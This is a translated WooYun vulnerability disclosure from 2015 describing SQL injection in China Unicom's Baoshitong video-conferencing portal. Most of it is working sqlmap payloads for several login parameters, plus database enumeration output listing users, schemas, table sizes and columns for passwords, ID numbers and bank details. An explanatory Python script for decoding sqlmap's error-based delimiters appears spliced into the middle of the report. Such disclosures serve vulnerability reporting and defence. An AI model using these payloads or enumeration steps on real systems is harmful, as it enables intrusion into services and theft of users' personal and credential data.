
Vulnerability summary

Defect ID: wooyun-2015-0145995

Title: Multiple parameters in China Unicom's Baoshitong (宝视通) service are SQL-injectable (9 databases and a large amount of data exposed)

Vendor: China Unicom (中国联通)

Author: 路人甲

Submitted: 2015-10-11 14:41

Fixed: 2015-11-30 09:06

Published: 2015-11-30 09:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-11: Details sent to the vendor, awaiting vendor action
2015-10-16: Vendor confirmed; details visible to the vendor only
2015-10-26: Details disclosed to core white hats and relevant domain experts
2015-11-05: Details disclosed to regular white hats
2015-11-15: Details disclosed to intern white hats
2015-11-30: Details disclosed to the public

Brief description:

Multiple parameters at one location are SQL-injectable; the injection reaches 9 databases (Oracle schemas) and exposes a large amount of data.

Details:

http://**.**.**.**/bugs/wooyun-2015-0136114
mentions the address http://**.**.**.**/manager/login.cfm.
The reporter of that one said it had a weak password, but after all this time it should have been fixed, and sure enough, testing showed the easy pickings are gone!
Try injection instead? My skills weren't up to it, I couldn't find anything, and even the mighty sqlmap didn't help. So, give up?
Out of boredom I deleted everything after the host and landed somewhere else:
http://**.**.**.**/
There is an "English" link in the top right corner; clicking it leads to another address:
http://**.**.**.**/newtvuser_eng/index1.cfm
Likewise, clicking "视讯会议" (video conferencing) on the first address leads to
http://**.**.**.**/newtvuser/index1.cfm
As you can see, one is just the English version and the other the Chinese version.
http://**.**.**.**/
……
http://**.**.**.**/
The same.
After entering "New Conference", capture the request:

http://**.**.**.**/newtvuser_eng/logincheck.cfm (POST)
subway=1&id=18315&sysname=admin&syspass=d7ae0c107d07a3e5649785bc12d34014&submit2.x=26&submit2.y=9


[screenshot: 1.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: id
Type: boolean-based blind
Title: Oracle boolean-based blind - Parameter replace (original value)
Payload: subway=1&id=(SELECT (CASE WHEN (8593=8593) THEN 18315 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)&sysname=admin&syspass=d7ae0c107d07a3e5649785bc12d34014&submit2.x=26&submit2.y=9
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: subway=1&id=18315 AND 5000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(114)||CHR(108)||CHR(119)||CHR(113)||(SELECT (CASE WHEN (5000=5000) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(108)||CHR(99)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)&sysname=admin&syspass=d7ae0c107d07a3e5649785bc12d34014&submit2.x=26&submit2.y=9
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: subway=1&id=18315 AND 6913=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)&sysname=admin&syspass=d7ae0c107d07a3e5649785bc12d34014&submit2.x=26&submit2.y=9
---
[11:25:02] [INFO] the back-end DBMS is Oracle
web application technology: ColdFusion
back-end DBMS: Oracle
[11:25:02] [INFO] fetching current user
[11:25:02] [INFO] resumed: MCU
current user: 'MCU'
[11:25:02] [INFO] fetching current database
[11:25:02] [INFO] resumed: MCU
[11:25:02] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'MCU'
[11:25:02] [INFO] testing if current user is DBA
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] n
current user is DBA: False
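The error-based payloads in the sqlmap output above work through the marker strings sqlmap builds with CHR(): the value it wants to read is concatenated between two random delimiters and handed to XMLType(), and because a name starting with "<:" is not valid XML the database raises ORA-31011/LPX-00110 and quotes the offending name, delimiters and value included, in an error that the ColdFusion page passes back to the client. The Python script below is an added example, not code from the report or from sqlmap: it decodes the CHR() concatenations of the two payloads on this page back into their delimiters and pulls the leaked value out of a constructed error message (the ORA-31011/LPX-00110 text is typed in as sample input, not captured from the target).

```python
import re

# Added example: decode the delimiters sqlmap hides in its Oracle "XMLType"
# error-based payloads and recover the leaked value from the error text.
# Nothing here is code from the report or from sqlmap itself.

CHR_RE = re.compile(r"CHR\((\d+)\)", re.IGNORECASE)

# Both payloads are copied from this report (the id= one and the ConfPwd= one).
PAYLOAD_ID = (
    "18315 AND 5000=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(114)||"
    "CHR(108)||CHR(119)||CHR(113)||(SELECT (CASE WHEN (5000=5000) THEN 1 ELSE 0 END) "
    "FROM DUAL)||CHR(113)||CHR(108)||CHR(99)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)"
)
PAYLOAD_CONFPWD = (
    "111111' AND 1244=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||"
    "CHR(111)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1244=1244) THEN 1 ELSE 0 END) "
    "FROM DUAL)||CHR(113)||CHR(109)||CHR(102)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) "
    "AND 'knXb'='knXb"
)

# Constructed sample of what the application would hand back when the id=
# payload runs: Oracle's XML parser rejects "<:" as a name start and quotes the
# offending QName, delimiters and the probe's result ("1") included.
SAMPLE_ERROR = (
    "ORA-31011: XML parsing failed\n"
    "ORA-19202: Error occurred in XML processing\n"
    'LPX-00110: Warning: invalid QName ":qrlwq1qlczq" (not a Name)\n'
)


def decode_chr_concat(expr):
    """Turn an Oracle CHR(60)||CHR(58)||... concatenation into the string it builds."""
    return "".join(chr(int(code)) for code in CHR_RE.findall(expr))


def split_marker(payload):
    """Return the (start, stop) delimiters from an sqlmap XMLType payload.

    The XMLType() argument has the shape
        <start CHRs> || (SELECT <probe or query> FROM DUAL) || <stop CHRs>
    where the start CHRs spell "<:" plus a random string and the stop CHRs
    spell a random string plus ">". The "<:" and ">" only exist to make the
    XML name invalid; the random strings are what the extractor looks for.
    """
    m = re.search(r"XMLType\((.*)\)\)\s*FROM DUAL\)", payload,
                  re.IGNORECASE | re.DOTALL)
    if not m:
        raise ValueError("not an sqlmap XMLType error-based payload")
    start_expr, _, rest = m.group(1).partition("||(SELECT ")
    _probe, _, stop_expr = rest.partition(" FROM DUAL)||")
    start = decode_chr_concat(start_expr)
    stop = decode_chr_concat(stop_expr)
    if not (start.startswith("<:") and stop.endswith(">")):
        raise ValueError("unexpected delimiter shape: %r %r" % (start, stop))
    return start[2:], stop[:-1]


def extract_from_error(error_text, start, stop):
    """Pull the value sandwiched between the delimiters out of an error page.

    Returns None when the delimiters are absent, which is what sqlmap sees
    when the statement failed for another reason or errors are not echoed.
    """
    m = re.search(re.escape(start) + r"(.*?)" + re.escape(stop),
                  error_text, re.DOTALL)
    return m.group(1) if m else None


if __name__ == "__main__":
    start, stop = split_marker(PAYLOAD_ID)
    print("id= payload delimiters:", start, stop)
    print("ConfPwd= payload delimiters:", *split_marker(PAYLOAD_CONFPWD))
    print("value leaked by the probe:", extract_from_error(SAMPLE_ERROR, start, stop))
```

With real extraction sqlmap swaps the CASE WHEN probe for a subquery such as SELECT USER FROM DUAL, so the same delimiters frame whatever the query returns; the detection run on this page only confirms that "1" comes back when the predicate is true, which is all sqlmap needs before it starts enumerating.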


database management system users [27]:
[*] ANONYMOUS
[*] BACKUP
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MCU
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NETMNG
[*] NOAHSOFT
[*] OLAPSYS
[*] ORA_MONITOR
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SDTMAINTAIN
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


available databases [9]:
[*] CTXSYS
[*] EXFSYS
[*] MCU
[*] MDSYS
[*] NOAHSOFT
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WMSYS


Database: MCU
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| END_PARTY | 2091945 | what are these 2 million-plus rows?
| STAT_DAY_TERMDISC | 2005892 |
| STAT_CONF_DETAIL | 1982752 |
| STAT_MONTH_CONFDUR_TMP | 1781997 |
| STAT_P2P_DETAIL | 1594103 |
| END_PARTY_20120625 | 1346753 |
| TERMINAL_SEQUENCE | 1000000 |
| END_PORT_SCHEDULE | 675669 |
| ADMIN_LOG_CONF_CONTROL | 346447 | admin conference control log?
| ADMIN_LOG_20111219 | 320167 | admin log backup?
| ADMIN_LOG | 288829 | admin log?
| STAT_DAY_CONFDISC | 257599 |
| STAT_DAY_MCU | 253309 | what is this?
| TERMINAL_DISCOUNT_20120827 | 187672 |
| TERMINAL_DISCOUNT | 182010 |
| END_MCUS | 160201 | and what is this?
| END_RESERVATION | 160201 |
| END_PREVIEW | 139998 |
| STAT_DAY_CONFDISC_NEW | 85999 |
| END_TERMINAL_DISCOUNT | 79507 |
| NH_STAT_DAY | 77201 |
| STAT_MONTH_P2P | 51110 |
| END_VIDEO_SCHEDULE | 49561 |
| STAT_REPORT_TERMIND | 47076 |
| HISTORY_PARTY | 33992 |
| STAT_REPORT_CONFCOU | 32844 |
| STAT_REPORT_CONFDUR | 32844 |
| TMP_ADMIN_LOG | 31707 | a TMP admin log?
| HISTORY_PARTY20121213 | 29352 |
| HISTORY_PARTY20130629 | 29344 |
| HISTORY_PARTY_20130124 | 29193 |
| HISTORY_PARTY_20130411 | 28241 |
| TERMINAL_BILL_LIST | 28211 |
| HISTORY_PARTY20120119 | 28200 |
| STAT_MONTH_VIP | 23843 |
| TERMINAL_3GBAK_20141017 | 23159 |
| TERMINAL_20120517 | 23035 |
| TERMINAL_20131204 | 23004 |
| TERMINAL_20130608 | 22998 |
| TERMINAL_20130923 | 22979 |
| DQX_TEST | 22969 |
| TERMINAL_20130705 | 22966 |
| TERMINAL20130629 | 22964 |
| TERMINAL_20130401 | 22953 |
| TERMINAL_20130411 | 22953 |
| TERMINAL_20130124 | 22944 |
| TERMINAL20121213 | 22932 |
| TERMINAL_20121028 | 22910 |
| TERMINAL_BSSOK | 22910 |
| TERMINAL20120119 | 22858 |
| TERMINAL_20111219 | 22827 |
| TERMINAL | 22618 |
| TEMPLATE_PARTY | 22470 |
| TEMPLATE_PARTY_20130124 | 18336 |
| TEMPLATE_PARTY20121213 | 18311 |
| TEMPLATE_PARTY20130629 | 17962 |
| TEMPLATE_PARTY_20130411 | 17939 |
| ERR_PREVIEW_TERMINAL | 17343 |
| CIRCUIT_RES20120517 | 16683 |
| TERMINALLT20130520 | 16427 |
| TEMPLATE_PARTY20120119 | 16335 |
| CIRCUIT_RES | 15931 |
| TEMPLATE_PARTY_20110703 | 15657 |
| BSS_ADMIN_LOG | 13951 | BSS admin log
| CURVE_ERRORLOG | 13560 |
| END_TERMINAL_BILL_LIST | 12277 |
| END_TERMINAL | 10604 |
| NH_STAT_DAY_20110623 | 10285 |
| END_TERMINAL_20121028 | 9891 |
| USER_INFO | 6040 | user info
| USER_INFO20130629 | 5848 | user info backup
| USER_INFO_20121028 | 5637 | user info backup
| END_TERMINAL_ONOFF_DATE | 5544 |
| ADMIN_PROC_LOG | 5394 | what kind of admin log is this?
| NH_REPEATPARTY | 4551 |
| TERMINALLT20130520_1 | 4048 |
| HISTORY_PREVIEW | 2880 |
| HISTORY_PREVIEW20130629 | 2411 |
| HISTORY_PREVIEW_20130411 | 2397 |
| HISTORY_PREVIEW20121213 | 2371 |
| HISTORY_PREVIEW20120119 | 2197 |
| HISTORY_PREVIEW20111018 | 2157 |
| HISTORY_PREVEW20110919 | 2144 |
| STAT_USER_TERM_CAREER | 2127 | user occupation?
| END_USER_INFO | 2083 | END user info?
| END_USER_INFO_20121028 | 2061 | END user info backup?
| STAT_MONTH_P2P_TEMP20110525 | 1956 |
| TALIAS_TMP | 1789 |
| OPERATOR_ROLE_20111219 | 1429 |
| OPERATOR_INFO_20111219 | 1360 |
| OPERATOR_ROLE20110801 | 1356 |
| STAT_MONTH_CONFDISC | 1331 |
| SUBGROUP_INFO | 1171 |
| TEMPLATE_PREVIEW | 1138 |
| CGLOBAL | 998 |
| TEMPLATE_PREVIEW_20130411 | 937 |
| TEMPLATE_PREVIEW20130629 | 927 |
| TEMPLATE_PREVIEW20121213 | 915 |
| TEMPLATE_PREVIEW20120119 | 835 |
| TEMPLATE_PREVIEW20111018 | 800 |
| TEMPLATE_PREVEW20110919 | 789 |
| TEMPLATE_PREVIEW_20110703 | 782 |
| TEMP_TABLE | 758 |
| OPERATOR_ROLE | 749 |
| APPROVE_PARTY20130629 | 593 |
| ERR_PREVIEW | 576 |
| OPERATOR_INFO | 516 |
| ADMIN_LOGTEST | 507 | admin test log
| NH_USER_ATTR | 492 | some user attribute, not sure what
| NETUSER | 461 | NET users
| TERMINAL_ONOFF_DATE | 421 |
| CITY_TELE_RES | 394 |
| GROUP_INFO | 393 |
| CITY_INFO | 388 |
| TEMPL_PARTY | 383 |
| CAREER_GROUP_INFO | 379 |
| GROUP_INFO_NEW | 375 |
| GROUP_INFO_OLD | 368 |
| TERMINAL_NH_SICHUAN | 363 |
| CITY_TELE_RES_20111018 | 360 |
| CITY_TELE_RES_20111129 | 360 |
| CITY_TELE_RES_20111207 | 360 |
| CITY_TELE_RES_20111219 | 360 |
| CITY_INFO20121031 | 356 |
| CITY_INFO_20121028 | 356 |
| SP_ERR_RECORD | 356 |
| CDATA | 345 |
| TERMINAL_BRAND_TMP | 337 |
| PARTY20130629 | 309 |
| SERVICE_IP_RES20130916 | 304 |
| SERVICE_RES20130916 | 304 |
| SERVICE_IP_RES | 298 |
| SERVICE_RES | 298 |
| NHUSER20130701 | 269 | NH user backup
| END_PARTY_20120614 | 248 |
| APPROVE_PARTY20121213 | 222 |
| NH_STAT_TEMP | 215 |
| NATION_INFO | 189 |
| TEMPTEST | 178 |
| TERMINAL_BILL_CONFIG | 152 |
| TERMINAL_NH20121219 | 147 |
| TERMINAL_ALIAS_TMP | 144 |
| CONTACT_INFO | 127 |
| TERMINAL20121205 | 127 |
| MCU_RES20130916 | 126 |
| MCU_RES | 125 |
| MCU_RES_3GBAK_20141017 | 125 |
| NH_USER_ATTR20130629 | 119 | NH user attribute backup
| MCU_RES20120331 | 108 |
| MCU_RES_20111220 | 104 |
| TERMINAL_TMP | 104 |
| TEMPL_PREVIEW | 80 |
| TERMINAL_TMP_20121101 | 60 |
| STAT_REPORT | 55 |
| PARTY | 54 |
| NH_SUBGROUP_ATTRIBUTE_INFO | 51 |
| NH_SUBGROUP_ATTR_INFO20130629 | 41 |
| PROVINCE_INFO | 39 |
| PROVINCE_INFO_20121028 | 39 |
| RMX4000_PORTNUM_RES | 38 |
| RESERVATION20130629 | 33 |
| OTHER_INFO | 27 |
| GK_NEIGHBOR | 26 |
| OTHER_INFO_3GBAK_20141017 | 26 |
| ROLE_OPERATOR_CODE | 26 |
| GK_NEIGHBOR_20111219 | 25 |
| GK_NEIGHBOR_20111207 | 24 |
| OTHER_INFO20131211 | 24 |
| GK_NEIGHBOR_20111129 | 23 |
| TERMINAL_OPERAT_TYPE20121028 | 23 |
| TERMINAL_OPERATION_TYPE | 23 |
| GK_NEIGHBOR_20111018 | 22 |
| OPERATOR_TYPE | 22 |
| RMX4000_PORTNUM_RES20130629 | 22 |
| GK_RES | 21 |
| GK_RES20120331 | 21 |
| PBCATEDT | 21 |
| CONFIG_HOST_ADDRESS | 20 |
| GK_RES_20111219 | 20 |
| PBCATFMT | 20 |
| PORT_SCHEDULE | 20 |
| TERMINAL_3G_TEMPDATA_20141018 | 20 |
| GK_RES_20111207 | 19 |
| OPERATOR_TYPE_20111219 | 19 |
| TERMINAL_DISCOUNT_T | 19 |
| GK_RES_20111129 | 18 |
| FEERATE_PATTERNS | 17 |
| GK_RES_20111018 | 17 |
| OTHER_INFO20130629 | 17 |
| TERMINAL_BILL_PATTERN | 17 |
| TERMINAL_BILL_PATTERN_20121028 | 17 |
| END_TERMINAL_3G | 16 |
| SUB_TERMINAL_ATTRIBUTE_INFO | 16 |
| OTHER_INFO_20121028 | 15 |
| REGION_GROUPS_UNION | 15 |
| GROUP_HOST_ADDRESS_20130830 | 14 |
| OTHER_INFO20120118 | 14 |
| ROLE_RES | 14 |
| CPNUM_RES | 13 |
| HOTEL_RES | 13 |
| TERMINAL_OPERATIONTYPE20121028 | 13 |
| GROUP_HOST_ADDRESS20130629 | 12 |
| PARTY_0315 | 12 |
| APPROVE_PREVIEW20130629 | 11 |
| PREVIEW20130629 | 11 |
| GK_ADDZERO | 10 |
| HIGHRATE_INFO | 10 |
| HOST_ADDRESS_20131018 | 10 |
| CONFIG_HOST_ADDRESS_20131018 | 9 |
| TMP_LOG | 9 |
| MEETINGROOM_RES | 8 |
| NHUSER20130722 | 8 | NH user backup
| TERMINAL_ATTRIBUTE_INFO | 8 |
| TERMINAL_BRAND_TYPE | 8 |
| TERMINAL_TMP20130111 | 8 |
| APPROVE_PREVIEW20121213 | 7 |
| CAREER_INFO | 7 |
| CONTINENT_INFO | 7 |
| CONTINENT_INFO_20121028 | 7 |
| HOTEL_STAR_INFO | 7 |
| ADEPT | 6 |
| CALLRIGHT_INFO | 6 |
| CERTIFICATE_INFO | 6 |
| GROUP_HOST_ADDRESS | 6 |
| GZWHOST_ADDRESS | 6 |
| HIGHMCU_CONFIG_RES | 6 |
| LOGINKEY | 6 |
| MCU_PARAMTER_CONFIG | 6 |
| NOTICE_INFO | 6 |
| RATE_INFO | 6 |
| RESOLUTION_VIDEOPROTOCOL_RES | 6 |
| SUBGROUP_ATTRIBUTE_INFO | 6 |
| BILL_MANNER_INFO | 5 |
| DIC_TELT | 5 |
| HOTEL_BELIEVE_INFO | 5 |
| MEETINGROOM_CONTENT_INFO | 5 |
| TERMINAL_BRAND | 5 |
| HOST_DNSCONFIG | 4 |
| RESOLUTION_RES | 4 |
| TERMINAL_3G | 4 |
| CNUNIET_TERMINAL | 3 |
| CONFIG_VISUAL_PATH | 3 |
| END_CONTACT_INFO | 3 |
| GROUP_OTHER_INFO20130629 | 3 |
| NH_ALLCONF_MASTERMCU20130629 | 3 |
| NH_HIGHMCU_CONFIG_RES20130629 | 3 |
| NH_LEVEL_INFO | 3 |
| RESOLUTION_RES20130629 | 3 |
| TERMINAL_BILL_LIST_T | 3 |
| TRANS_RECORD | 3 |
| USER_ATTRIBUTE_INFO | 3 | user info
| APPROVE_USER_INFO | 2 | approved user info?
| GROUP_OTHER_INFO | 2 |
| MCUS | 2 |
| NETWORK_RES | 2 |
| NETWORK_RES_20121028 | 2 |
| NH_LEVEL_INFO20130629 | 2 |
| NH_USER_ATTR_INFO | 2 | some user info
| NHUSER20130710 | 2 | another user info backup
| PORT_CURVE | 2 |
| PREVIEW | 2 |
| RESERVATION | 2 |
| VIDEO_SCHEDULE | 2 |
| BBSS_ADD_TERMINAL | 1 | BBSS add terminal?
| CONF_DEFAULT_PARA_CONFIG | 1 |
| HOST_ADDRESS | 1 | host address?
| LOG_SCHEDULE | 1 |
| MCUS_0315 | 1 |
| RESERVATION_0315 | 1 |
| SPGROUP_INFO | 1 |
| TERMINAL20121228 | 1 |
| TERMINAL_ALIAS_INFO | 1 |
| TERMINAL_GK_INFO | 1 |
| TERMINAL_T | 1 |
+--------------------------------+---------+
web application technology: ColdFusion
back-end DBMS: Oracle
Database: MCU
Table: END_PARTY
[51 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| ACTION | NUMBER |
| VERSION | NUMBER |
| AGGREGATION | NUMBER |
| ALIAS | VARCHAR2 |
| ALIASTYPE | NUMBER |
| AUTHENPASSWD | VARCHAR2 |
| AUTODETECT | NUMBER |
| BITRATE323 | NUMBER |
| BONDINGNUMBER | VARCHAR2 |
| CASCADEMCU | VARCHAR2 |
| CASCADESERVICE | VARCHAR2 |
| CASECADE | VARCHAR2 |
| CHAIR | NUMBER |
| CITY_CODE | VARCHAR2 |
| CONNECTIONTYPE | NUMBER |
| EMAIL | VARCHAR2 |
| ENHANCEDVIDEO | NUMBER |
| FRAME | NUMBER |
| GROUPID | NUMBER |
| H320CHAIR | NUMBER |
| ID | NUMBER |
| INTERFACETYPE | NUMBER |
| IPADDRESS | VARCHAR2 |
| LABELID | NUMBER |
| MASTERCONFT | NUMBER |
| MCU_ALIAS | VARCHAR2 |
| MCUNAME | VARCHAR2 |
| MCUPHONENUMBER | VARCHAR2 |
| MEETMEPER | NUMBER |
| NAME | VARCHAR2 |
| NEWPARTY | NUMBER |
| NUMBEROFCHANNELS | NUMBER |
| NUMTYPE | NUMBER |
| OWNERID | NUMBER |
| PARTYPHONENUMBER | VARCHAR2 |
| PROVID | VARCHAR2 |
| RESERV_FLAG | NUMBER |
| RESID | NUMBER |
| RESOLUTION_CODE | NUMBER |
| RESTRICTED | NUMBER |
| SEQNUM | NUMBER |
| SERVICE | VARCHAR2 |
| SIGNALPORT323 | NUMBER |
| STATUS | NUMBER |
| SUBSERVICE | VARCHAR2 |
| TERMINALTYPE | NUMBER |
| USEPORT | NUMBER |
| USERNAME | VARCHAR2 |
| VIDEOPROTOCOL | NUMBER |
| VOICE | NUMBER |
| VOLUME | NUMBER |
+------------------+----------+


[screenshot: 2.jpg]


You can see AUTHENPASSWD, the authentication password column.

| END_MCUS | 160201 |
| USER_INFO | 6040 |
| END_USER_INFO | 2083 |
| MCUS | 2 |
Database: MCU
Table: END_USER_INFO
[44 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| ACCOUNT | VARCHAR2 |
| ACCOUNT_FUNCTION | NUMBER |
| ACCOUNT_TYPE | NUMBER |
| ADDRESS | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| BILL_CONTENT | NUMBER |
| BILL_RECEIVER_FAX | VARCHAR2 |
| BILL_RECEIVER_NAME | VARCHAR2 |
| BILL_SEND_ADDRESS | VARCHAR2 |
| BILL_SEND_POSTCODE | CHAR |
| BONDING_USERID | VARCHAR2 |
| BUSINESS_TELEPHONE | VARCHAR2 |
| CAREER | VARCHAR2 |
| CERTIFICATE_NUMBER | VARCHAR2 |
| CERTIFICATE_TYPE | VARCHAR2 |
| CITY | VARCHAR2 |
| CONTINENT_CODE | NUMBER |
| CREATE_DATE | VARCHAR2 |
| EMAIL | VARCHAR2 |
| FAX | VARCHAR2 |
| FINA_FLAG | NUMBER |
| GROUP_NAME | VARCHAR2 |
| NAME | VARCHAR2 |
| NATION_CODE | CHAR |
| PASSWORD | VARCHAR2 |
| PAY_MODE | VARCHAR2 |
| POST_CODE | VARCHAR2 |
| PROVINCE | VARCHAR2 |
| REPRESENTATION | VARCHAR2 |
| RESPOND | VARCHAR2 |
| SEQUENCE_ID | NUMBER |
| SUBGROUP_NAME | VARCHAR2 |
| TELEPHONE | VARCHAR2 |
| TERMINAL_NUMBER | VARCHAR2 |
| UNIT_NAME | VARCHAR2 |
| UNREG_DATE | DATE |
| USE_DATE | VARCHAR2 |
| USE_IVR | VARCHAR2 |
| USE_TOKEN | VARCHAR2 |
| USER_ATTRIBUTE | VARCHAR2 |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_RIGHT | VARCHAR2 |
| USER_TYPE | VARCHAR2 |
+--------------------+----------+
Database: MCU
Table: USER_INFO
[47 columns]
+--------------------+----------+
| Column | Type |
+--------------------+----------+
| ACCOUNT | VARCHAR2 |
| ACCOUNT_FUNCTION | NUMBER |
| ACCOUNT_TYPE | NUMBER |
| ADDRESS | VARCHAR2 |
| BANK_NAME | VARCHAR2 |
| BILL_CONTENT | NUMBER |
| BILL_RECEIVER_FAX | VARCHAR2 |
| BILL_RECEIVER_NAME | VARCHAR2 |
| BILL_SEND_ADDRESS | VARCHAR2 |
| BILL_SEND_POSTCODE | CHAR |
| BONDING_USERID | VARCHAR2 |
| BUSINESS_TELEPHONE | VARCHAR2 |
| CAREER | VARCHAR2 |
| CERTIFICATE_NUMBER | VARCHAR2 |
| CERTIFICATE_TYPE | VARCHAR2 |
| CITY | VARCHAR2 |
| CONTACT_NAME | VARCHAR2 |
| CONTINENT_CODE | NUMBER |
| CREATE_DATE | VARCHAR2 |
| EMAIL | VARCHAR2 |
| EMAIL_SWITCH | NUMBER |
| FAX | VARCHAR2 |
| GROUP_NAME | VARCHAR2 |
| MESSAGE_SWITCH | NUMBER |
| MOBILETEL | VARCHAR2 |
| NAME | VARCHAR2 |
| NATION_CODE | CHAR |
| PASSWORD | VARCHAR2 |
| PAY_MODE | VARCHAR2 |
| POST_CODE | VARCHAR2 |
| PROVINCE | VARCHAR2 |
| RANDOM_CODE | VARCHAR2 |
| REGISTER_GK | NUMBER |
| REPRESENTATION | VARCHAR2 |
| RESPOND | VARCHAR2 |
| SUBGROUP_NAME | VARCHAR2 |
| TELEPHONE | VARCHAR2 |
| TERMINAL_NUMBER | VARCHAR2 |
| UNIT_NAME | VARCHAR2 |
| USE_DATE | VARCHAR2 |
| USE_IVR | VARCHAR2 |
| USE_TOKEN | VARCHAR2 |
| USER_ATTRIBUTE | VARCHAR2 |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_RIGHT | VARCHAR2 |
| USER_TYPE | VARCHAR2 |
+--------------------+----------+
Database: MCU
Table: MCUS
[14 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| FIRSTNUMBER | VARCHAR2 |
| GROUPID | NUMBER |
| ID | NUMBER |
| IP | VARCHAR2 |
| LASTNUMBER | VARCHAR2 |
| LOGIN | VARCHAR2 |
| MCU_VERSION_TYPE | NUMBER |
| MCUORDER | NUMBER |
| NAME | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PORTNUMBER | NUMBER |
| PREFIX | VARCHAR2 |
| TTCMUSED | NUMBER |
| TYPE | NUMBER |
+------------------+----------+
Database: MCU
Table: END_MCUS
[14 columns]
+------------------+----------+
| Column | Type |
+------------------+----------+
| FIRSTNUMBER | VARCHAR2 |
| GROUPID | NUMBER |
| ID | NUMBER |
| IP | VARCHAR2 |
| LASTNUMBER | VARCHAR2 |
| LOGIN | VARCHAR2 |
| MCU_VERSION_TYPE | NUMBER |
| MCUORDER | NUMBER |
| NAME | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PORTNUMBER | NUMBER |
| PREFIX | VARCHAR2 |
| TTCMUSED | NUMBER |
| TYPE | NUMBER |
+------------------+----------+


[screenshot: 3.jpg]


[screenshot: 6.jpg]


I won't list the remaining databases!
Injection point 2:

http://**.**.**.**/confcontrol_eng/mainnew/sublogincheck.asp?controlserver=**.**.**.**&webserver=**.**.**.**&ConfName=admin&ConfPwd=111111&TerminalAuth=123456&submit2.x=30&submit2.y=17 (GET)


ConfName, ConfPwd and TerminalAuth are all injectable.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ConfPwd
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: controlserver=**.**.**.**&webserver=video2.dynns.**.**.**.**&ConfName=admin&ConfPwd=111111' AND 1244=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||CHR(111)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1244=1244) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(102)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'knXb'='knXb&TerminalAuth=123456&submit2.x=30&submit2.y=17
Place: GET
Parameter: TerminalAuth
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: controlserver=**.**.**.**&webserver=video2.dynns.**.**.**.**&ConfName=admin&ConfPwd=111111&TerminalAuth=123456' AND 2273=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||CHR(111)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (2273=2273) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(102)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'WNaw'='WNaw&submit2.x=30&submit2.y=17
Place: GET
Parameter: ConfName
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: controlserver=**.**.**.**&webserver=video2.dynns.**.**.**.**&ConfName=admin' AND 5044=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(119)||CHR(111)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5044=5044) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(109)||CHR(102)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'ksik'='ksik&ConfPwd=111111&TerminalAuth=123456&submit2.x=30&submit2.y=17
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: ConfPwd, type: Single quoted string (default)
[1] place: GET, parameter: TerminalAuth, type: Single quoted string
[2] place: GET, parameter: ConfName, type: Single quoted string
[q] Quit
> 0
[13:30:03] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[13:30:03] [INFO] fetching current user
[13:30:03] [INFO] retrieved: MCU
current user: 'MCU'
[13:30:03] [INFO] fetching current database
[13:30:03] [INFO] resumed: MCU
[13:30:03] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'MCU'
[13:30:03] [INFO] testing if current user is DBA
current user is DBA: False


